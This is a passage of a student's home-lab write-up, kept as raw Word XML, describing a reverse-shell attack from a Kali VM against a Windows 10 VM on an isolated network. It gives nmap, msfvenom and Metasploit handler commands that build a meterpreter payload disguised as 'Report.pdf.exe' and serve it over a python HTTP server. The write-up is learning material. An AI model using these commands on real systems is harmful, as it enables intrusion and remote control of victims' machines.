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AB800" w14:textId="7A0C03B5" w:rsidR="00FB0A34" w:rsidRPr="00BE4BF2" w:rsidRDefault="003E14D0" w:rsidP="00FB0A34">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE4BF2">
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Home</w:t>
      </w:r>
      <w:r w:rsidR="00F37D49" w:rsidRPr="00BE4BF2">
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> L</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE4BF2">
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>ab Project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700E3FE6" w14:textId="77777777" w:rsidR="00FB0A34" w:rsidRPr="00FB0A34" w:rsidRDefault="00FB0A34" w:rsidP="00FB0A34">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38CBFDE2" w14:textId="181968A5" w:rsidR="00FB0A34" w:rsidRDefault="00FB0A34" w:rsidP="00FB0A34">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CE9B1AF" w14:textId="4B7F10E1" w:rsidR="00BE4BF2" w:rsidRDefault="00BE4BF2" w:rsidP="00FB0A34">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Purpose of a home lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C24058B" w14:textId="2863A585" w:rsidR="00BE4BF2" w:rsidRDefault="00BE4BF2" w:rsidP="00FB0A34">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">As a student who is aspiring to break into the cybersecurity field, I </w:t>
      </w:r>
      <w:r w:rsidR="005C4F0C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>have learnt that hands-on experience is essential</w:t>
      </w:r>
      <w:r w:rsidR="000D33ED">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to be kept in the loop as the field is everchanging</w:t>
      </w:r>
      <w:r w:rsidR="00A72E10">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. A home lab allows for me to test out </w:t>
      </w:r>
      <w:r w:rsidR="00685556">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">real-world problems, experiment and learn to understand how </w:t>
      </w:r>
      <w:r w:rsidR="002F13A7">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">attacks occur in a safe, sandboxed environment. For this project, I will set up two virtual machines (one running Kali Linux and the other running Windows 10) and have </w:t>
      </w:r>
      <w:r w:rsidR="00A06B30">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">one act as an attacker and the other as a target. I will try to gain </w:t>
      </w:r>
      <w:r w:rsidR="001E4BAE">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>access to the Windows virtual machine’s shell via a reverse shell attack.</w:t>
      </w:r>
      <w:r w:rsidR="001D5AD4">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> A reverse shell attack</w:t>
      </w:r>
      <w:r w:rsidR="009C7FD4">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> initiates a shell session and allows for the attacker to redirect the input and outputs of the</w:t>
      </w:r>
      <w:r w:rsidR="006D6899">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> shell so that it can be used by the attacker. The delivery method of this attack that I will use is a</w:t>
      </w:r>
      <w:r w:rsidR="0047598F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="006D6899">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> .exe file </w:t>
      </w:r>
      <w:r w:rsidR="0047598F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>disguised as a .pdf.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E853A4C" w14:textId="349A7E1F" w:rsidR="001C579F" w:rsidRDefault="001C579F" w:rsidP="00FB0A34">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67E9447E" w14:textId="77777777" w:rsidR="001C579F" w:rsidRPr="001C579F" w:rsidRDefault="001C579F" w:rsidP="00FB0A34">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A6AAAC9" w14:textId="71F1ACD1" w:rsidR="001C579F" w:rsidRDefault="001C579F" w:rsidP="00FB0A34">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C579F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Steps followed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D8054C" w14:textId="5754CB9E" w:rsidR="00E54619" w:rsidRDefault="00E85398" w:rsidP="00E54619">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>First</w:t>
      </w:r>
      <w:r w:rsidR="00C33F7D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">I </w:t>
      </w:r>
      <w:r w:rsidR="00730720">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>chose a hosted hyperviso</w:t>
      </w:r>
      <w:r w:rsidR="00C33F7D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">r. I chose </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C33F7D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Virtualbox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C33F7D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> because I was familiar with it and had previously used it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0302AD68" w14:textId="39FDBD13" w:rsidR="00E54619" w:rsidRDefault="00E54619" w:rsidP="00E54619">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, I downloaded Kali Linux </w:t>
      </w:r>
      <w:r w:rsidR="00B82CF8">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">and the Windows 10 ISO from their </w:t>
      </w:r>
      <w:r w:rsidR="008A64CD">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">respective websites and set them up on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008A64CD">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Virtualbox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008A64CD">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244A96DA" w14:textId="670F96CB" w:rsidR="008A64CD" w:rsidRDefault="008A64CD" w:rsidP="00E54619">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">I downloaded </w:t>
      </w:r>
      <w:r w:rsidR="004E0924">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sysmon and Splunk on the Windows 10 machine at this point as it still has a connection to the internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E8000B" w14:textId="482F4241" w:rsidR="004E0924" w:rsidRDefault="004E0924" w:rsidP="00E54619">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Both virtual machines were then both configured to be part of their own internal network, meaning they could communicate with each other but did not have an active connection to the internet. Static IPs were set for each one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDE7CB1" w14:textId="6D0D807E" w:rsidR="004E0924" w:rsidRDefault="00C9033E" w:rsidP="00E54619">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Creating infected file on Kali Linux VM</w:t>
      </w:r>
      <w:r w:rsidR="000B50AC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> using the terminal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2517632D" w14:textId="19C09437" w:rsidR="00C9033E" w:rsidRDefault="00C3613C" w:rsidP="00C9033E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -A {Windows </w:t>
      </w:r>
      <w:r w:rsidR="00817CE5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>10 VM IP} -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00817CE5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Pn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00817CE5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> “ – scans for any open ports on the target machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E402373" w14:textId="3A0CCBB3" w:rsidR="00817CE5" w:rsidRDefault="00BC6E4C" w:rsidP="00C9033E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Returned that port 3389 was exposed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76646E93" w14:textId="39417736" w:rsidR="0069244B" w:rsidRDefault="00BC6E4C" w:rsidP="0069244B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0069244B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p windows/x64/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0069244B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>meterpreter_reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0069244B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0069244B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>lhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0069244B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="0027199B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">{Kali VM IP} </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0027199B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>lport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0027199B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=4444 -f exe -o Report.pdf.exe</w:t>
      </w:r>
      <w:r w:rsidR="00CC57DC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidR="0027199B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">– this command specifies </w:t>
      </w:r>
      <w:r w:rsidR="000B50AC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">the payload of the attack (reverse </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000B50AC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000B50AC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">), specifies the host of the attack, the port and the file </w:t>
      </w:r>
      <w:r w:rsidR="004C3D49">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="004C3D49">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>it’s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="004C3D49">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75134532" w14:textId="63EBEB04" w:rsidR="00332E2A" w:rsidRPr="00332E2A" w:rsidRDefault="00332E2A" w:rsidP="00332E2A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CA3D8BC" wp14:editId="689A669F">
            <wp:extent cx="6645910" cy="1732915"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="850304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04540" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="1732915"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AFF262" w14:textId="61E6608A" w:rsidR="00064EB3" w:rsidRDefault="00064EB3" w:rsidP="0069244B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">” -&gt; </w:t>
      </w:r>
      <w:r w:rsidR="000F7483">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“use exploit/multi/handler</w:t>
      </w:r>
      <w:r w:rsidR="00C76ED6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00D448F1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
      <w:r w:rsidR="00F131BC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00CE03AB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>set payload window</w:t>
      </w:r>
      <w:r w:rsidR="000D2C2C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00CE03AB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/x64/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CE03AB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CE03AB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CE03AB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F131BC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> “ – sets the payload option</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D083473" w14:textId="6B94A6FA" w:rsidR="00060714" w:rsidRDefault="00060714" w:rsidP="0069244B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">“exploit” </w:t>
      </w:r>
      <w:r w:rsidR="00D80071">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D80071">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>starts the handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F7BD3A" w14:textId="3F269B07" w:rsidR="000C6439" w:rsidRDefault="002C36CD" w:rsidP="0069244B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">“python3 -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 999” – allows for the Windows machine in the same network to access the infected file </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F82C43" w14:textId="415CDD22" w:rsidR="009445C3" w:rsidRDefault="009445C3" w:rsidP="00C17045">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="229C3ECA" wp14:editId="18B16C8A">
            <wp:extent cx="4562475" cy="581025"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="1817354001"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354001" name="Picture 1" descr="A screenshot of a phone&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4562475" cy="581025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E56A0B2" w14:textId="60566B0C" w:rsidR="00CA62B8" w:rsidRDefault="00C17045" w:rsidP="00CA62B8">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="215659AC" wp14:editId="3E162441">
            <wp:extent cx="5457825" cy="1628775"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="894836626"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36626" name="Picture 1" descr="A close-up of a computer screen&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5457825" cy="1628775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="55163A18" w14:textId="588ADAE8" w:rsidR="00CA62B8" w:rsidRDefault="008737CD" w:rsidP="00CA62B8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Disable Windows Defender and o</w:t>
      </w:r>
      <w:r w:rsidR="00060714">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pen the fi</w:t>
      </w:r>
      <w:r w:rsidR="00D80071">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>le on the Windows VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5894F5" w14:textId="1D905B2C" w:rsidR="008737CD" w:rsidRDefault="008737CD" w:rsidP="00CA62B8">
      <w:pPr>
